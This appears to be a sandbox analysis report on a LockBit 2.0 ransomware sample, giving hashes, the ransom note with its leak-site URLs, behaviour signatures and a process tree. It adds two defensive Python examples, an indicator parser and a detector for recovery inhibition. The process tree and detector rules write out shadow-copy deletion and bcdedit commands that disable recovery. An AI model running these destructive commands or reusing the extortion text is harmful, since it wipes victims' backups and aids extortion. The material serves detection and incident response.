Analysis

  • max time kernel
    146s
  • max time network
    83s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64 arch:x86 image:win7-20221111-en locale:en-us os:windows7-x64 system
  • submitted
    08/02/2023, 09:00

General

  • Target

    411b8cd39606bbe551627f1868bb4ace1f9fcb5387b6a58b9bb7f31c50109e10.exe

  • Size

    1.5MB

  • MD5

    fe5101b50e92a923d74cc6f0f4225539

  • SHA1

    f7a2fc4e471a203c8a5683c02ada2c3931c8f0ec

  • SHA256

    411b8cd39606bbe551627f1868bb4ace1f9fcb5387b6a58b9bb7f31c50109e10

  • SHA512

    bd1fa89a7a1f7b9f1bcb6ac574b9ad09d8cd053723b24f8d5fbe4a5946e6fce4325040364d1e9e79f98421bc8c656e4601ba4c96ff63b1472bbb01b59e0414ee

  • SSDEEP

    24576:EbRKGN66DdkfD2mtArFoZpAQbuSy6Pj44aOLu5S3+RIYMpS:+RK4ZWDVt4G2r67458tYMU

Malware Config

Extracted

Path

C:\program files\7-zip\Restore-My-Files.txt

Ransom Note

LockBit 2.0 Ransomware
Your data are stolen and encrypted
The data will be published on TOR website http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion and https://bigblog.at if you do not pay the ransom
You can contact us and decrypt one file for free on these TOR sites
http://lockbitsup4yezcd5enk5unncx3zcy7kw6wllyqmiyhvanjj352jayid.onion
http://lockbitsap2oaqhcun3syvbqt6n5nzt7fqosc6jdlmsfleu3ka4k2did.onion
OR https://decoding.at
Decryption ID: 8DF287EDD983EB1511B30AC9F07CAE0B

URLs

http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion

https://bigblog.at

http://lockbitsup4yezcd5enk5unncx3zcy7kw6wllyqmiyhvanjj352jayid.onion

http://lockbitsap2oaqhcun3syvbqt6n5nzt7fqosc6jdlmsfleu3ka4k2did.onion

https://decoding.at
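
A small parser for this note format, written here as an added example (it is not part of the sandbox report and not code from the malware): it pulls the Tor sites, clearnet mirrors and Decryption ID out of a Restore-My-Files.txt so they can go straight into a blocklist or case notes. The note text in the block is the one quoted above with its line breaks restored; the result field names and the to_iocs helper are this example's own choices.

```python
"""Extract the actionable indicators from a LockBit 2.0 ransom note in the
Restore-My-Files.txt layout shown above: Tor leak and negotiation sites,
their clearnet mirrors and the per-victim Decryption ID.

Added example, not code from the sandbox or from the malware. NOTE_TEXT is
the note quoted on this page with its line breaks restored; the result
field names are this example's own choice.
"""
import re
from urllib.parse import urlparse

NOTE_TEXT = """\
LockBit 2.0 Ransomware
Your data are stolen and encrypted
The data will be published on TOR website http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion and https://bigblog.at if you do not pay the ransom
You can contact us and decrypt one file for free on these TOR sites
http://lockbitsup4yezcd5enk5unncx3zcy7kw6wllyqmiyhvanjj352jayid.onion
http://lockbitsap2oaqhcun3syvbqt6n5nzt7fqosc6jdlmsfleu3ka4k2did.onion
OR https://decoding.at
Decryption ID: 8DF287EDD983EB1511B30AC9F07CAE0B
"""

URL_RX = re.compile(r"https?://[^\s\"'<>]+")
# v3 onion service names are 56 base32 characters; v2 names were 16.
ONION_RX = re.compile(r"^(?:[a-z2-7]{56}|[a-z2-7]{16})\.onion$")
FAMILY_RX = re.compile(r"LockBit\s*2\.0", re.I)
DECRYPTION_ID_RX = re.compile(r"Decryption ID:\s*([0-9A-F]{32})\b", re.I)


def _dedupe(items):
    seen, out = set(), []
    for item in items:
        if item not in seen:
            seen.add(item)
            out.append(item)
    return out


def parse_note(text: str) -> dict:
    """Return family, Tor sites, clearnet sites and Decryption ID from the note.
    Missing or malformed pieces come back as None / empty lists rather than
    raising, so the parser can run over every Restore-My-Files.txt on a host."""
    tor, clearnet = [], []
    for raw in URL_RX.findall(text):
        url = raw.rstrip(".,;:)")          # trailing prose punctuation
        host = urlparse(url).hostname or ""
        if host.endswith(".onion"):
            if ONION_RX.match(host):       # reject truncated or garbled onion names
                tor.append(url)
        else:
            clearnet.append(url)
    m = DECRYPTION_ID_RX.search(text)
    return {
        "family": "LockBit 2.0" if FAMILY_RX.search(text) else None,
        "tor_sites": _dedupe(tor),
        "clearnet_sites": _dedupe(clearnet),
        "decryption_id": m.group(1).upper() if m else None,
    }


def to_iocs(parsed: dict) -> list:
    """Flatten the parsed note to (type, value) pairs for a blocklist or case notes."""
    iocs = [("domain", urlparse(u).hostname)
            for u in parsed["tor_sites"] + parsed["clearnet_sites"]]
    if parsed["decryption_id"]:
        iocs.append(("lockbit_decryption_id", parsed["decryption_id"]))
    return iocs


if __name__ == "__main__":
    for kind, value in to_iocs(parse_note(NOTE_TEXT)):
        print(f"{kind}\t{value}")
```

The Decryption ID is per victim, so it is useful for tying notes found on several hosts to one intrusion rather than as a family-wide indicator; the onion names and clearnet mirrors are what belong on the block list.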

Signatures

  • Lockbit

    Ransomware family with multiple variants released since late 2019.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

    Turns off Windows Recovery and automatic repair for the default boot entry (bcdedit /set {default} recoveryenabled no and bootstatuspolicy ignoreallfailures, see the process tree below) so the victim cannot boot into the recovery environment to roll the system back.

  • Modifies extensions of user files 6 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 20 IoCs

    Sets the ThreadHideFromDebugger flag on its own threads so an attached debugger stops receiving events from them; a common anti-analysis step.

  • Suspicious use of SetThreadContext 1 IoCs

    Seen in the first-stage process (PID 2040 below) together with MapViewOfSection and WriteProcessMemory against a child copy of itself (PID 936); consistent with unpacking the payload into a hollowed child process.
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\411b8cd39606bbe551627f1868bb4ace1f9fcb5387b6a58b9bb7f31c50109e10.exe
    "C:\Users\Admin\AppData\Local\Temp\411b8cd39606bbe551627f1868bb4ace1f9fcb5387b6a58b9bb7f31c50109e10.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of WriteProcessMemory
    PID:2040
    • C:\Users\Admin\AppData\Local\Temp\411b8cd39606bbe551627f1868bb4ace1f9fcb5387b6a58b9bb7f31c50109e10.exe
      …
      2⤵
      • Modifies extensions of user files
      • Adds Run key to start application
      • Drops file in System32 directory
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Drops file in Program Files directory
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:936
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2100
        • C:\Windows\system32\vssadmin.exe
          vssadmin delete shadows /all /quiet
          4⤵
          • Interacts with shadow copies
          PID:2152
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic shadowcopy delete
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:752
        • C:\Windows\system32\bcdedit.exe
          bcdedit /set {default} bootstatuspolicy ignoreallfailures
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:2108
        • C:\Windows\system32\bcdedit.exe
          bcdedit /set {default} recoveryenabled no
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:2120
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 936 -s 1712
        3⤵
        • Program crash
        PID:2568
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2040 -s 480
      2⤵
      • Program crash
      PID:900
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2212
  • C:\Windows\explorer.exe
    "C:\Windows\explorer.exe"
    1⤵
    PID:2400
  • C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0xc8
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2664
  • C:\Windows\system32\NOTEPAD.EXE
    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Documents\Restore-My-Files.txt
    1⤵
    PID:236
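
The cmd.exe line at PID 2100 is the whole recovery-inhibition chain in one command, and each piece also appears as its own child process, so a detection that only keys on the vssadmin.exe or bcdedit.exe image name fires four separate low-context alerts and misses the chained form entirely if the children are blocked by policy. The following Python is an added example (not from the sandbox or the malware) of matching the chain on the full command line, tolerating cmd.exe caret obfuscation, and walking parent PIDs back past cmd.exe to the process that actually launched it. The event records are constructed from the process tree above; the parent PIDs of the two top-level processes and the vssvc.exe entry are assumed because the page does not list them, and the dict layout stands in for whatever your EDR or Sysmon Event ID 1 feed provides.

```python
"""Detect the recovery-inhibition chain seen in this LockBit 2.0 report
(vssadmin / wmic / bcdedit) in process-creation telemetry and attribute it
to the process that launched it.

Added example; not part of the sandbox report or the LockBit code. The
event records below are constructed from the process tree on this page
(PIDs and command lines as reported; parent PIDs of the two top-level
processes and of the vssvc.exe entry are assumed, since the page does not
list them).
"""
import re
from collections import defaultdict

# Each rule names one action of "Inhibit System Recovery" (ATT&CK T1490).
# Rules run against the whole command line, so a chained
# "cmd /c a & b & c" line fires every rule it contains, not just the first.
RULES = {
    "vssadmin_delete_shadows":
        re.compile(r"\bvssadmin(?:\.exe)?\b.*?\bdelete\s+shadows\b", re.I),
    "wmic_shadowcopy_delete":
        re.compile(r"\bwmic(?:\.exe)?\b.*?\bshadowcopy\s+delete\b", re.I),
    "bcdedit_recoveryenabled_no":
        re.compile(r"\bbcdedit(?:\.exe)?\b.*?\brecoveryenabled\s+no\b", re.I),
    "bcdedit_ignore_boot_failures":
        re.compile(r"\bbcdedit(?:\.exe)?\b.*?\bbootstatuspolicy\s+ignoreallfailures\b", re.I),
}

# Images that merely relay the command; attribution climbs past them.
RELAY_IMAGES = ("cmd.exe", "vssadmin.exe", "wmic.exe", "bcdedit.exe")


def normalize(cmdline: str) -> str:
    """Undo cheap cmd.exe obfuscation: caret escapes (vss^admin), quoting
    and irregular whitespace, so the rules see the real tokens."""
    return re.sub(r"\s+", " ", cmdline.replace("^", "").replace('"', ""))


def match_rules(cmdline: str) -> set:
    text = normalize(cmdline)
    return {name for name, rx in RULES.items() if rx.search(text)}


def origin_of(pid: int, by_pid: dict) -> int:
    """Walk parent PIDs until the image is not a relay binary; that is the
    process that actually requested the recovery inhibition."""
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        ev = by_pid[pid]
        if not ev["image"].lower().endswith(RELAY_IMAGES):
            return pid
        pid = ev["ppid"]
    return pid


def detect(events: list) -> dict:
    """Return {origin_pid: {rule names}} for every origin that triggered at
    least one rule, merging hits from the chained line and its children."""
    by_pid = {e["pid"]: e for e in events}
    hits = defaultdict(set)
    for e in events:
        labels = match_rules(e["cmd"])
        if labels:
            hits[origin_of(e["pid"], by_pid)] |= labels
    return dict(hits)


def severity(labels: set) -> str:
    # A single action is occasionally legitimate admin work; two or more
    # distinct recovery-inhibition actions from one origin is the ransomware pattern.
    return "high" if len(labels) >= 2 else "medium"


SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\411b8cd39606bbe551627f1868bb4ace1f9fcb5387b6a58b9bb7f31c50109e10.exe"
CHAIN = (r'"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet'
         r' & wmic shadowcopy delete'
         r' & bcdedit /set {default} bootstatuspolicy ignoreallfailures'
         r' & bcdedit /set {default} recoveryenabled no')

# Constructed telemetry modelled on the report's process tree.
EVENTS = [
    {"pid": 2040, "ppid": 1,    "image": SAMPLE, "cmd": f'"{SAMPLE}"'},  # ppid assumed
    {"pid": 936,  "ppid": 2040, "image": SAMPLE, "cmd": SAMPLE},
    {"pid": 2100, "ppid": 936,  "image": r"C:\Windows\System32\cmd.exe", "cmd": CHAIN},
    {"pid": 2152, "ppid": 2100, "image": r"C:\Windows\system32\vssadmin.exe",
     "cmd": "vssadmin delete shadows /all /quiet"},
    {"pid": 752,  "ppid": 2100, "image": r"C:\Windows\System32\Wbem\WMIC.exe",
     "cmd": "wmic shadowcopy delete"},
    {"pid": 2108, "ppid": 2100, "image": r"C:\Windows\system32\bcdedit.exe",
     "cmd": "bcdedit /set {default} bootstatuspolicy ignoreallfailures"},
    {"pid": 2120, "ppid": 2100, "image": r"C:\Windows\system32\bcdedit.exe",
     "cmd": "bcdedit /set {default} recoveryenabled no"},
    {"pid": 2212, "ppid": 1,    "image": r"C:\Windows\system32\vssvc.exe",
     "cmd": r"C:\Windows\system32\vssvc.exe"},  # benign VSS service, ppid assumed
]

if __name__ == "__main__":
    for origin, labels in detect(EVENTS).items():
        print(f"origin PID {origin} [{severity(labels)}]: {', '.join(sorted(labels))}")
```

Run against the constructed tree this yields one high-severity finding attributed to PID 936 (the unpacked second-stage copy of the sample) carrying all four actions, rather than five alerts spread over cmd.exe and its children; vssvc.exe, which merely services the deletion request, does not fire. The same attribution step is what lets a responder kill the right process, since terminating bcdedit.exe does nothing about the encryptor that spawned it.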

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\Documents\Restore-My-Files.txt
    Filesize
    512B
    MD5
    652ce061d8c7011015003b458470dd94
    SHA1
    353640c65c9d98061d3b56076b41db2331b88ec6
    SHA256
    d89af9270fe1a128b0379b82286ee95a5dbfdc96c3850626c537a7e40bfa3b7a
    SHA512
    3c1f72d95424773024b1e7e574e03c507f3776c715721f335dd574092e3c1705a210619b2ce6f6efd66399808b319fb9b1b3fd555fea96b64781c4ed27bfcc56

  • \Users\Admin\AppData\Local\Temp\nsyFF57.tmp\System.dll
    (the NSIS installer's System plugin, unpacked to the installer's ns*.tmp directory; this is the dropped DLL loaded by the first-stage process PID 2040)
    Filesize
    12KB
    MD5
    cff85c549d536f651d4fb8387f1976f2
    SHA1
    d41ce3a5ff609df9cf5c7e207d3b59bf8a48530e
    SHA256
    8dc562cda7217a3a52db898243de3e2ed68b80e62ddcb8619545ed0b4e7f65a8
    SHA512
    531d6328daf3b86d85556016d299798fa06fefc81604185108a342d000e203094c8c12226a12bd6e1f89b0db501fb66f827b610d460b933bd4ab936ac2fd8a88

  • memory/936-63-0x0000000000400000-0x00000000004FB000-memory.dmp
    Filesize
    1004KB

  • memory/936-60-0x00000000004FA000-0x00000000004FB000-memory.dmp
    Filesize
    4KB

  • memory/936-58-0x00000000004FA000-0x00000000004FB000-memory.dmp
    Filesize
    4KB

  • memory/936-62-0x0000000000400000-0x00000000004FB000-memory.dmp
    Filesize
    1004KB

  • memory/936-56-0x0000000000401000-0x00000000004E1000-memory.dmp
    Filesize
    896KB

  • memory/2040-54-0x00000000753F1000-0x00000000753F3000-memory.dmp
    Filesize
    8KB

  • memory/2400-69-0x000007FEFB881000-0x000007FEFB883000-memory.dmp
    Filesize
    8KB